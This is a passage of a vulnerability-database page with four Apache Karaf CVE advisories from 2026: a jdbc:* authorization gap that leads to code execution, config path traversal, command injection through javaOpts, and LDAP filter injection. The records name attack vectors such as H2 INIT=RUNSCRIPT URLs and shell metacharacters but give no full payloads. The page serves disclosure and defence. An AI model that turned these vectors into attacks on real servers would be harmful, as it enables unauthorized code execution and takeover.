        "dateUpdated": "2026-10-01T14:18:12.957Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-91048 (GCVE-0-2026-91048)

    Vulnerability from nvd – Published: 2026-09-29 08:34 – Updated: 2026-10-01 14:13
    VLAI
    Title
    Apache Karaf: Missing authorization on the jdbc:* shell command scope allows privilege escalation to remote code execution via jdbc:ds-create
    Summary
    The jdbc shell command scope shipped no org.apache.karaf.command.acl.jdbc.cfg. Karaf's command guard (SecuredSessionFactoryImpl) treats a command with no matching ACL rule as allowed, so any authenticated shell session (including one holding only the viewer role) could run every jdbc:* command. jdbc:ds-create stores a fully attacker-controlled JDBC URL into a pax-jdbc-config factory Configuration with no validation. pax-jdbc-config reactively turns that into a live DataSource. Several JDBC drivers run code or SQL at connection time based on URL parameters (e.g. H2 INIT=RUNSCRIPT), so a viewer-level shell user could reach arbitrary code execution, bypassing the admin-role gate that already protects shell:exec. This is a privilege-escalation-to-RCE chain, not merely an "admin misconfiguration". The same applies to jms:* shell commands.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: total
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-10-01 14:13 UTC
    CWE
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-29T09:15:44.666Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/9"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 9.8,
                  "baseSeverity": "CRITICAL",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-91048",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-10-01T14:13:10.417139Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-10-01T14:13:30.717Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "MopMonk-AI \u003cmopmonk-ai@tophant.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "The\u0026nbsp;\u003ccode\u003ejdbc\u003c/code\u003e\u0026nbsp;shell command scope shipped no\u0026nbsp;\u003ccode\u003eorg.apache.karaf.command.acl.jdbc.cfg\u003c/code\u003e. Karaf\u0027s command guard (\u003ccode\u003eSecuredSessionFactoryImpl\u003c/code\u003e) treats a command with no matching ACL rule as \u003cb\u003eallowed\u003c/b\u003e, so any authenticated shell session (including one holding only the\u0026nbsp;\u003ccode\u003eviewer\u003c/code\u003e\u0026nbsp;role) could run every\u0026nbsp;\u003ccode\u003ejdbc:*\u003c/code\u003e\u0026nbsp;command.\u0026nbsp;\u003ccode\u003ejdbc:ds-create\u003c/code\u003e\u0026nbsp;stores a fully attacker-controlled JDBC URL into a\u0026nbsp;\u003ccode\u003epax-jdbc-config\u003c/code\u003e\u0026nbsp;factory\u0026nbsp;\u003ccode\u003eConfiguration\u003c/code\u003e\u0026nbsp;with no validation.\u0026nbsp;\u003ccode\u003epax-jdbc-config\u003c/code\u003e\u0026nbsp;reactively turns that into a live\u0026nbsp;\u003ccode\u003eDataSource\u003c/code\u003e. Several JDBC drivers run code or SQL at connection time based on URL parameters (e.g. H2\u0026nbsp;\u003ccode\u003eINIT=RUNSCRIPT\u003c/code\u003e), so a\u0026nbsp;\u003ccode\u003eviewer\u003c/code\u003e-level shell user could reach arbitrary code execution, bypassing the\u0026nbsp;\u003ccode\u003eadmin\u003c/code\u003e-role gate that already protects\u0026nbsp;\u003ccode\u003eshell:exec\u003c/code\u003e. This is a privilege-escalation-to-RCE chain, not merely an \"admin misconfiguration\".\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThe same applies to\u0026nbsp;\u003ccode\u003ejms:*\u003c/code\u003e\u0026nbsp;shell commands.\u003c/div\u003e"
                }
              ],
              "value": "The\u00a0jdbc\u00a0shell command scope shipped no\u00a0org.apache.karaf.command.acl.jdbc.cfg. Karaf\u0027s command guard (SecuredSessionFactoryImpl) treats a command with no matching ACL rule as allowed, so any authenticated shell session (including one holding only the\u00a0viewer\u00a0role) could run every\u00a0jdbc:*\u00a0command.\u00a0jdbc:ds-create\u00a0stores a fully attacker-controlled JDBC URL into a\u00a0pax-jdbc-config\u00a0factory\u00a0Configuration\u00a0with no validation.\u00a0pax-jdbc-config\u00a0reactively turns that into a live\u00a0DataSource. Several JDBC drivers run code or SQL at connection time based on URL parameters (e.g. H2\u00a0INIT=RUNSCRIPT), so a\u00a0viewer-level shell user could reach arbitrary code execution, bypassing the\u00a0admin-role gate that already protects\u00a0shell:exec. This is a privilege-escalation-to-RCE chain, not merely an \"admin misconfiguration\".\n\n\nThe same applies to\u00a0jms:*\u00a0shell commands."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "moderate"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-862",
                  "description": "CWE-862",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-29T08:34:47.193Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://lists.apache.org/thread/ph3867mxh2tft75w0o1hpn10f5mbmw32"
            }
          ],
          "source": {
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: Missing authorization on the jdbc:* shell command scope allows privilege escalation to remote code execution via jdbc:ds-create",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-91048",
        "datePublished": "2026-09-29T08:34:47.193Z",
        "dateReserved": "2026-09-14T17:14:08.734Z",
        "dateUpdated": "2026-10-01T14:13:30.717Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-91012 (GCVE-0-2026-91012)

    Vulnerability from nvd – Published: 2026-09-29 08:34 – Updated: 2026-10-01 14:10
    VLAI
    Title
    Apache Karaf: Path Traversal in Config Service Allows Manager-to-Admin Privilege Escalation
    Summary
    org.apache.karaf.config.core.impl.ConfigRepositoryImpl#update(pid, properties), which backs the "config" MBean and the config:* shell commands, derives the file it writes a configuration to from caller-supplied input without checking that the result stays inside ${karaf.etc}: * if the submitted property map contains a felix.fileinstall.filename entry, that value is turned directly into a File (getCfgFileFromProperty), so it can point to any absolute path the Karaf process can write to; * otherwise the configuration PID is concatenated verbatim into the target file name (generateConfigFilename(): new File(karaf.etc, pid + ".cfg")), so a PID containing ".." segments resolves outside ${karaf.etc}. createFactoryConfiguration() has the same issue via the factory PID/alias. Both code paths are reachable by any caller holding the "manager" role under Karaf's shipped command/JMX ACL (org.apache.karaf.command.acl.conf.cfg: "update = manager"). Such a user can therefore write attacker-controlled content to any file the Karaf process can write, including files the same ACL otherwise reserves to "admin" (etc/users.properties, etc/*.acl.*.cfg, etc/org.apache.karaf.management.cfg, and similar), allowing a manager-role user to grant themselves the admin role or otherwise take over the container. ConfigMBeanImpl.install() and the config:install shell command already guarded the equivalent risk on their own code path with a finalname.contains("..") string check, but that check does not stop absolute paths or symlink-based escapes, and it was never applied to ConfigRepositoryImpl.update() / createFactoryConfiguration() at all.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: total
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-10-01 14:10 UTC
    CWE
    • CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-29T09:15:41.656Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/8"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 9.8,
                  "baseSeverity": "CRITICAL",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-91012",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-10-01T14:10:12.183455Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-22",
                    "description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-10-01T14:10:47.838Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "packageName": "org.apache.karaf.config.core.impl",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "n0mi1k \u003cnomilksec@gmail.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cdiv\u003e\u003cspan\u003eorg.apache.karaf.config.core.impl.ConfigRepositoryImpl#update(pid, properties)\u003c/span\u003e,\nwhich backs the \"config\" MBean and the config:* shell commands, derives the file\nit writes a configuration to from caller-supplied input without checking that\nthe result stays inside\u0026nbsp;\u003ccode\u003e${karaf.etc}\u003c/code\u003e:\u003c/div\u003e\u003cdiv\u003e\u003cul\u003e\u003cli\u003eif the submitted property map contains a\u0026nbsp;\u003ccode\u003efelix.fileinstall.filename\u003c/code\u003e\u0026nbsp;entry, that value is turned directly into a\u0026nbsp;\u003ccode\u003eFile\u003c/code\u003e\u0026nbsp;(\u003ccode\u003egetCfgFileFromProperty\u003c/code\u003e), so it can point to any absolute path the Karaf process can write to;\u003c/li\u003e\u003cli\u003eotherwise the configuration PID is concatenated verbatim into the target file name (\u003ccode\u003egenerateConfigFilename(): new File(karaf.etc, pid + \".cfg\")\u003c/code\u003e), so a PID containing \"..\" segments resolves outside\u0026nbsp;\u003ccode\u003e${karaf.etc}\u003c/code\u003e.\u0026nbsp;\u003ccode\u003ecreateFactoryConfiguration()\u003c/code\u003e\u0026nbsp;has the same issue via the factory PID/alias.\u003c/li\u003e\u003c/ul\u003e\u003cdiv\u003eBoth code paths are reachable by any caller holding the \"manager\" role under Karaf\u0027s shipped command/JMX ACL (\u003ccode\u003eorg.apache.karaf.command.acl.conf.cfg:\u003c/code\u003e\u0026nbsp;\"\u003ccode\u003eupdate = manager\u003c/code\u003e\"). Such a user can therefore write attacker-controlled content to any file the Karaf process can write, including files the same ACL otherwise reserves to \"\u003ccode\u003eadmin\u003c/code\u003e\" (\u003ccode\u003eetc/users.properties\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eetc/*.acl.*.cfg\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eetc/org.apache.karaf.management.cfg\u003c/code\u003e, and similar), allowing a manager-role user to grant themselves the admin role or otherwise take over the container.\u003c/div\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003cspan\u003eConfigMBeanImpl.install()\u003c/span\u003e\u0026nbsp;and the\u0026nbsp;\u003ccode\u003econfig:install\u003c/code\u003e\u0026nbsp;shell command already guarded the equivalent risk on their own code path with a\u0026nbsp;\u003ccode\u003efinalname.contains(\"..\")\u003c/code\u003e\u0026nbsp;string check, but that check does not stop absolute paths or symlink-based escapes, and it was never applied to\u0026nbsp;\u003ccode\u003eConfigRepositoryImpl.update()\u003c/code\u003e\u0026nbsp;/\u0026nbsp;\u003ccode\u003ecreateFactoryConfiguration()\u003c/code\u003e\u0026nbsp;at all.\u003c/div\u003e"
                }
              ],
              "value": "org.apache.karaf.config.core.impl.ConfigRepositoryImpl#update(pid, properties),\nwhich backs the \"config\" MBean and the config:* shell commands, derives the file\nit writes a configuration to from caller-supplied input without checking that\nthe result stays inside\u00a0${karaf.etc}:\n\n  *  if the submitted property map contains a\u00a0felix.fileinstall.filename\u00a0entry, that value is turned directly into a\u00a0File\u00a0(getCfgFileFromProperty), so it can point to any absolute path the Karaf process can write to;\n  *  otherwise the configuration PID is concatenated verbatim into the target file name (generateConfigFilename(): new File(karaf.etc, pid + \".cfg\")), so a PID containing \"..\" segments resolves outside\u00a0${karaf.etc}.\u00a0createFactoryConfiguration()\u00a0has the same issue via the factory PID/alias.\n\n\nBoth code paths are reachable by any caller holding the \"manager\" role under Karaf\u0027s shipped command/JMX ACL (org.apache.karaf.command.acl.conf.cfg:\u00a0\"update = manager\"). Such a user can therefore write attacker-controlled content to any file the Karaf process can write, including files the same ACL otherwise reserves to \"admin\" (etc/users.properties,\u00a0etc/*.acl.*.cfg,\u00a0etc/org.apache.karaf.management.cfg, and similar), allowing a manager-role user to grant themselves the admin role or otherwise take over the container.\n\n\n\n\n\n\nConfigMBeanImpl.install()\u00a0and the\u00a0config:install\u00a0shell command already guarded the equivalent risk on their own code path with a\u00a0finalname.contains(\"..\")\u00a0string check, but that check does not stop absolute paths or symlink-based escapes, and it was never applied to\u00a0ConfigRepositoryImpl.update()\u00a0/\u00a0createFactoryConfiguration()\u00a0at all."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "important"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-29T08:34:11.409Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://lists.apache.org/thread/op8trtz1qxkdwj2rjozhd9yt2yd6nhw4"
            }
          ],
          "source": {
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: Path Traversal in Config Service Allows Manager-to-Admin Privilege Escalation",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-91012",
        "datePublished": "2026-09-29T08:34:11.409Z",
        "dateReserved": "2026-09-14T16:27:00.736Z",
        "dateUpdated": "2026-10-01T14:10:47.838Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-91006 (GCVE-0-2026-91006)

    Vulnerability from nvd – Published: 2026-09-28 10:44 – Updated: 2026-09-29 21:03
    VLAI
    Title
    Apache Karaf: OS Command Injection in Child-Instance Launch (instance:* / InstancesMBean)
    Summary
    Apache Karaf's instance-management service (InstanceServiceImpl) builds the command line used to launch a child Karaf JVM by string concatenation, then executes it through /bin/sh (Unix) or cscript (Windows). The caller-supplied javaOpts value is spliced into that string unquoted. A javaOpts value containing shell metacharacters (;, |, `, $(...)) is interpreted by the shell instead of being passed to the JVM as an option, giving arbitrary OS command execution as the Karaf process user. Reachable via the shell commands instance:create, instance:start, instance:restart, instance:change-opts, and the equivalent InstanceMBean JMX operations (createInstance, startInstance, changeJavaOpts, cloneInstance). Mitigation  * Set karaf.secured.command.compulsory.roles=admin in etc/system.properties to close the fail-open gap for all unconfigured command scopes. * Restrict which principals can reach instance:* commands and InstancesMBean via etc/users.properties role assignments. * Treat javaOpts passed to instance:create/instance:start/instance:change-opts/InstancesMBean as untrusted input only from fully-trusted operators.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-09-29 03:55 UTC
    CWE
    • CWE-78 - Improper neutralization of special elements used in an OS command ('OS command injection')
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-28T13:10:12.951Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/3"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 8.8,
                  "baseSeverity": "HIGH",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "LOW",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-91006",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-09-29T03:55:20.472246Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-09-29T21:03:21.368Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "packageName": "org.apache.karaf:org.apache.karaf.instance.core",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "n0mi1k \u003cnomilksec@gmail.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "Apache Karaf\u0027s instance-management service (\u003ccode\u003eInstanceServiceImpl\u003c/code\u003e) builds the command line used to launch a child Karaf JVM by string concatenation, then executes it through\u0026nbsp;\u003ccode\u003e/bin/sh\u0026nbsp;\u003c/code\u003e(Unix) or\u0026nbsp;\u003ccode\u003ecscript\u003c/code\u003e\u0026nbsp;(Windows). The caller-supplied\u0026nbsp;\u003ccode\u003ejavaOpts\u003c/code\u003e\u0026nbsp;value is spliced into that string unquoted. A javaOpts value containing shell metacharacters (\u003ccode\u003e;\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e|\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e`\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e$(...)\u003c/code\u003e) is interpreted by the shell instead of being passed to the JVM as an option, giving arbitrary OS command execution as the Karaf process user.\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eReachable via the shell commands\u0026nbsp;\u003ccode\u003einstance:create\u003c/code\u003e,\u0026nbsp;\u003ccode\u003einstance:start\u003c/code\u003e,\u0026nbsp;\u003ccode\u003einstance:restart\u003c/code\u003e,\u0026nbsp;\u003ccode\u003einstance:change-opts\u003c/code\u003e, and the equivalent\u0026nbsp;\u003ccode\u003eInstanceMBean\u003c/code\u003e\u0026nbsp;JMX operations (\u003ccode\u003ecreateInstance\u003c/code\u003e,\u0026nbsp;\u003ccode\u003estartInstance\u003c/code\u003e,\u0026nbsp;\u003ccode\u003echangeJavaOpts\u003c/code\u003e,\u0026nbsp;\u003ccode\u003ecloneInstance\u003c/code\u003e).\u003c/div\u003e\u003ch3\u003eMitigation\u0026nbsp;\u003c/h3\u003e\u003cdiv\u003e\u003cul\u003e\u003cli\u003eSet\u0026nbsp;\u003ccode\u003ekaraf.secured.command.compulsory.roles=admin\u003c/code\u003e\u0026nbsp;in\u0026nbsp;\u003ccode\u003eetc/system.properties\u003c/code\u003e\u0026nbsp;to close the fail-open gap for all unconfigured command scopes.\u003c/li\u003e\u003cli\u003eRestrict which principals can reach\u0026nbsp;\u003ccode\u003einstance:*\u003c/code\u003e\u0026nbsp;commands and\u0026nbsp;\u003ccode\u003eInstancesMBean\u003c/code\u003e\u0026nbsp;via\u0026nbsp;\u003ccode\u003eetc/users.properties\u003c/code\u003e\u0026nbsp;role assignments.\u003c/li\u003e\u003cli\u003eTreat\u0026nbsp;\u003ccode\u003ejavaOpts\u003c/code\u003e\u0026nbsp;passed to i\u003ccode\u003enstance:create\u003c/code\u003e/\u003ccode\u003einstance:start\u003c/code\u003e/\u003ccode\u003einstance:change-opts\u003c/code\u003e/\u003ccode\u003eInstancesMBean\u003c/code\u003e\u0026nbsp;as untrusted input only from fully-trusted operators.\u003c/li\u003e\u003c/ul\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e"
                }
              ],
              "value": "Apache Karaf\u0027s instance-management service (InstanceServiceImpl) builds the command line used to launch a child Karaf JVM by string concatenation, then executes it through\u00a0/bin/sh\u00a0(Unix) or\u00a0cscript\u00a0(Windows). The caller-supplied\u00a0javaOpts\u00a0value is spliced into that string unquoted. A javaOpts value containing shell metacharacters (;,\u00a0|,\u00a0`,\u00a0$(...)) is interpreted by the shell instead of being passed to the JVM as an option, giving arbitrary OS command execution as the Karaf process user.\n\n\nReachable via the shell commands\u00a0instance:create,\u00a0instance:start,\u00a0instance:restart,\u00a0instance:change-opts, and the equivalent\u00a0InstanceMBean\u00a0JMX operations (createInstance,\u00a0startInstance,\u00a0changeJavaOpts,\u00a0cloneInstance).\n\nMitigation\u00a0  *  Set\u00a0karaf.secured.command.compulsory.roles=admin\u00a0in\u00a0etc/system.properties\u00a0to close the fail-open gap for all unconfigured command scopes.\n  *  Restrict which principals can reach\u00a0instance:*\u00a0commands and\u00a0InstancesMBean\u00a0via\u00a0etc/users.properties\u00a0role assignments.\n  *  Treat\u00a0javaOpts\u00a0passed to instance:create/instance:start/instance:change-opts/InstancesMBean\u00a0as untrusted input only from fully-trusted operators."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "moderate"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-78",
                  "description": "CWE-78 Improper neutralization of special elements used in an OS command (\u0027OS command injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-28T10:44:32.652Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://lists.apache.org/thread/olzy0yjw82b20w59vonfjr1x7v5yzocr"
            }
          ],
          "source": {
            "advisory": "https://karaf.apache.org/security/cve-2026-91006.txt",
            "defect": [
              "https://github.com/apache/karaf/pull/2878"
            ],
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: OS Command Injection in Child-Instance Launch (instance:* / InstancesMBean)",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-91006",
        "datePublished": "2026-09-28T10:44:32.652Z",
        "dateReserved": "2026-09-14T15:56:23.927Z",
        "dateUpdated": "2026-09-29T21:03:21.368Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-90979 (GCVE-0-2026-90979)

    Vulnerability from nvd – Published: 2026-09-28 09:34 – Updated: 2026-09-30 19:53
    VLAI
    Title
    Apache Karaf: LDAP filter injection in JAAS LDAP login modules
    Summary
    LDAPCache and LDAPBackingEngine build LDAP search filters for user lookup and role lookup by textually substituting the placeholders %u, %dn, and %fqdn (drawn from the login name, the resolved user DN, and its fully qualified namespace form) into administrator-configured filter templates (userFilter, roleFilter). Before the fix, the only sanitization applied to the substituted value was double backslashed: filter = filter.replaceAll(Pattern.quote("%u"), Matcher.quoteReplacement(user)); filter = filter.replace("\\", "\\\\"); This does not escape the other characters RFC 4515 requires escaping in an LDAP search filter: *, (, ), and NUL. A login name containing any of these can change the structure of the resulting filter rather than being matched as a literal value (e.g. a crafted username can turn an equality match into a wildcard match, or close/reopen filter clauses), widening what the search returns and potentially causing a login or role lookup to match an LDAP entry other than the intended one, over-granting roles, and depending on deployment-specific filter templates, potentially affecting which account a login resolved to. It's not exploitable through every entry points: LDAPLoginModule and LDAPPubkeyLoginModule both called Util.doRFC2254Encoding() (correct RFC 4515 escaping) on the login name before handing it to LDAPCache, which masked the missing escaping in LDAPCache for those two call paths. Using LDAPCache directly (bypassing the login modules) does not reproduce through the normal LDAPLoginModule/LDAPPubkeyLoginModule authentication flow for this reason. It does reproduce through two other call paths that reach LDAPCache/LDAPBackingEngine without any prior escaping: * GSSAPILdapLoginModule passes the NameCallback name straight through, unescaped. * LDAPBackingEngine (listRoles) passes principal.getName() straight through, unescaped.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: partial
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-09-30 19:53 UTC
    CWE
    • CWE-90 - Improper neutralization of special elements used in an LDAP query ('LDAP injection')
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-28T13:10:12.005Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/2"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "LOW",
                  "baseScore": 7.3,
                  "baseSeverity": "HIGH",
                  "confidentialityImpact": "LOW",
                  "integrityImpact": "LOW",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-90979",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-09-30T19:53:53.546419Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-09-30T19:53:57.685Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "packageName": "org.apache.karaf.jaas.modules.ldap",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
